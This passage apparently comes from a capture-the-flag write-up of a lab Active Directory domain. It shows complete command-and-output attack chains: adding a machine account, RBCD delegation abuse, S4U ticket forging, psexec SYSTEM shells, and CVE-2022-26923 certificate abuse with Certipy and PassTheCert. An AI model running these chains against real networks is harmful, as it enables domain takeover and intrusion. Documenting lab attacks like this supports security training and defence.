└─# proxychains -q impacket-addcomputer xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -dc-host xiaorang.lab -computer-name 'hacker1$' -computer-pass 'Admin@123'
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Successfully added machine account hacker1$ with password Admin@123.
Perform the RBCD write
proxychains -q impacket-rbcd xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -action write -delegate-to 'XR-0687$' -delegate-from 'hacker1$'
┌──(root㉿kali)-[~]
└─# proxychains -q impacket-rbcd xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -action write -delegate-to 'XR-0687$' -delegate-from 'hacker1$'
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] hacker1$ can now impersonate users on XR-0687$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] hacker1$ (S-1-5-21-3745972894-1678056601-2622918667-1147)
Create the ticket
proxychains -q impacket-getST xiaorang.lab/'hacker1$':'Admin@123' -dc-ip 172.22.15.13 -spn cifs/XR-0687.xiaorang.lab -impersonate Administrator
┌──(root㉿kali)-[~]
└─# proxychains -q impacket-getST xiaorang.lab/'hacker1$':'Admin@123' -dc-ip 172.22.15.13 -spn cifs/XR-0687.xiaorang.lab -impersonate Administrator
Impacket v0.11.0 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache
Import the ticket
export KRB5CCNAME=Administrator.ccache
┌──(root㉿kali)-[~]
└─# export KRB5CCNAME=Administrator.ccache
Connect without a password
proxychains -q impacket-psexec -k -no-pass -dc-ip 172.22.15.13 administrator@XR-0687.xiaorang.lab -codec gbk
┌──(root㉿kali)-[~]
└─# proxychains -q impacket-psexec -k -no-pass -dc-ip 172.22.15.13 administrator@XR-0687.xiaorang.lab -codec gbk
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Requesting shares on XR-0687.xiaorang.lab.....
[*] Found writable share ADMIN$
[*] Uploading file dTCaOTUw.exe
[*] Opening SVCManager on XR-0687.xiaorang.lab.....
[*] Creating service SLTU on XR-0687.xiaorang.lab.....
[*] Starting service SLTU.....
[!] Press help for extra shell commands
Microsoft Windows [版本 10.0.20348.1668]
(c) Microsoft Corporation。保留所有权利。
C:\Windows\system32> ipconfig
Windows IP 配置
以太网适配器 以太网 2:
连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::229d:267f:4c09:8690%7
IPv4 地址 . . . . . . . . . . . . : 172.22.15.35
子网掩码 . . . . . . . . . . . . : 255.255.0.0
默认网关. . . . . . . . . . . . . : 172.22.255.253
C:\Windows\system32> whoami
nt authority\system
C:\Users\Administrator> cd flag
C:\Users\Administrator\flag> type flag03.txt
__ _ __ ____
/ _| |__ _ __ _ / \__ /
| _| / _` / _` | () |_ \
|_| |_\__,_\__, |\__/___/
|___/
flag03: flag{98872a9a-79c0-4961-ad5d-3bbdde7830e4}
Method 2
Use bloodhound to analyse the domain environment:
Install the Neo4j database: apt-get install neo4j
fourth-flag
Active Directory domain privilege escalation vulnerability (CVE-2022-26923); fscan also flagged this at the very beginning
echo "172.22.15.13 XR-DC01.xiaorang.lab" >> /etc/hosts
This tool is needed
https://github.com/ly4k/Certipy/
python setup.py install
┌──(root㉿kali)-[~/Certipy]
└─# proxychains -q certipy account create -user 'hacker2$' -pass 'Admin@123' -dns XR-DC01.xiaorang.lab -dc-ip 172.22.15.13 -u lixiuying -p 'winniethepooh'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Creating new account:
sAMAccountName : hacker2$
unicodePwd : Admin@123
userAccountControl : 4096
servicePrincipalName : HOST/hacker2
RestrictedKrbHost/hacker2
dnsHostName : XR-DC01.xiaorang.lab
[*] Successfully created account 'hacker2$' with password 'Admin@123'
┌──(root㉿kali)-[~/Certipy]
└─# proxychains -q certipy req -u 'hacker2$@xiaorang.lab' -p 'Admin@123' -ca 'xiaorang-XR-CA-CA' -target 172.22.15.18 -template 'Machine'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 8
[*] Got certificate with DNS Host Name 'XR-DC01.xiaorang.lab'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'xr-dc01.pfx'
┌──(root㉿kali)-[~/Certipy]
└─# proxychains -q certipy auth -pfx xr-dc01.pfx -dc-ip 172.22.15.13
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: xr-dc01$@xiaorang.lab
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)
Convert the certificate format; the import password is empty, just press Enter
┌──(root㉿kali)-[~/Certipy]
└─# openssl pkcs12 -in xr-dc01.pfx -nodes -out test.pem
Enter Import Password:
┌──(root㉿kali)-[~/Certipy]
└─# openssl rsa -in test.pem -out test.key
writing RSA key
┌──(root㉿kali)-[~/Certipy]
└─# openssl x509 -in test.pem -out test.crt
The following is needed next
https://github.com/AlmondOffSec/PassTheCert/
Continue
┌──(root㉿kali)-[~/Certipy]
└─# ls
build certipy_ad.egg-info customqueries.json LICENSE setup.py test.key xr-dc01.pfx
certipy Certipy.spec dist README.md test.crt test.pem
┌──(root㉿kali)-[~/Certipy]
└─# proxychains -q passthecert.py -action whoami -crt test.crt -key test.key -domain xiaorang.lab -dc-ip 172.22.15.13
Impacket v0.11.0 - Copyright 2023 Fortra
[*] You are logged in as: XIAORANG\XR-DC01$
proxychains -q passthecert.py -action whoami -crt test.crt -key test.key -domain xiaorang.lab -dc-ip 172.22.15.13
proxychains -q passthecert.py -action write_rbcd -crt test.crt -key test.key -domain xiaorang.lab -dc-ip 172.22.15.13 -delegate-to 'XR-DC01$' -delegate-from 'hacker2$'
proxychains -q impacket-getST xiaorang.lab/'hacker2$':'Admin@123' -dc-ip 172.22.15.13 -spn cifs/XR-DC01.xiaorang.lab -impersonate Administrator
export KRB5CCNAME=Administrator.ccache
proxychains -q impacket-psexec -k -no-pass -dc-ip 172.22.15.13 administrator@XR-DC01.xiaorang.lab -codec gbk
[*] You are logged in as: XIAORANG\XR-DC01$
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Accounts allowed to act on behalf of other identity:
[*] hacker2$ (S-1-5-21-3745972894-1678056601-2622918667-1148)
[*] hacker2$ can already impersonate users on XR-DC01$ via S4U2Proxy
[*] Not modifying the delegation rights.
[*] Accounts allowed to act on behalf of other identity:
[*] hacker2$ (S-1-5-21-3745972894-1678056601-2622918667-1148)
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Requesting shares on XR-DC01.xiaorang.lab.....
[*] Found writable share ADMIN$
[*] Uploading file szppiQYo.exe
[*] Opening SVCManager on XR-DC01.xiaorang.lab.....
[*] Creating service gZxj on XR-DC01.xiaorang.lab.....
[*] Starting service gZxj.....
[!] Press help for extra shell commands
Microsoft Windows [版本 10.0.14393]
(c) 2016 Microsoft Corporation。保留所有权利。
C:\windows\system32>
This gives the flag
C:\Users\Administrator\flag> type flag04.txt
:::===== ::: :::==== :::===== :::==== ::: ===
::: ::: ::: === ::: ::: === ::: ===
====== === ======== === ===== === === ========
=== === === === === === === === ===
=== ======== === === ======= ====== ===
flag04: flag{d1fcc7fb-4736-4a7e-9693-0de3be345efe}
References
Fix for the "This could be due to CredSSP encryption oracle remediation" error when connecting to a remote server - CSDN blog
Chunqiu Cloud Mirror 2022 Wangding Cup semi-final WP - BattleofZhongDinghe - cnblogs.com
Chunqiu Cloud Realm 2022 Wangding Cup semi-final WP (one pass) - CSDN blog
2022 Wangding Cup semi-final review (gkjzjh146.github.io)
2022 Wangding Cup semi-final review - Chunqiu Cloud Realm | h0ny's blog
Chunqiu Cloud Mirror - 2022 Wangding Cup semi-final review - Writeup - CSDN blog
Active Directory Domain Services privilege escalation vulnerability CVE-2022-26923 - Tencent Cloud Developer Community (tencent.com)